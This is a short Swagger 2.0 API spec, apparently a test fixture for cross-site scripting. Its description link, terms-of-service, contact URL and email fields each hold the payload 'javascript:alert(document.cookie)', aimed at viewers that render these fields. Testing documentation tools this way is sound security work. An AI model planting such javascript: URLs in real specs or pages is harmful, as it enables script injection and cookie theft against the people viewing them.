swagger: "2.0"
info: 
  title: "dD0x Swagger"
  description: "Hello ![link](javascript:alert(document.cookie)"
  termsOfService: "javascript:alert(document.cookie)"
  contact: 
    name: "API Support"
    url: "javascript:alert(document.cookie)"
    email: "javascript:alert(document.cookie)"
  version: "1.0.1"
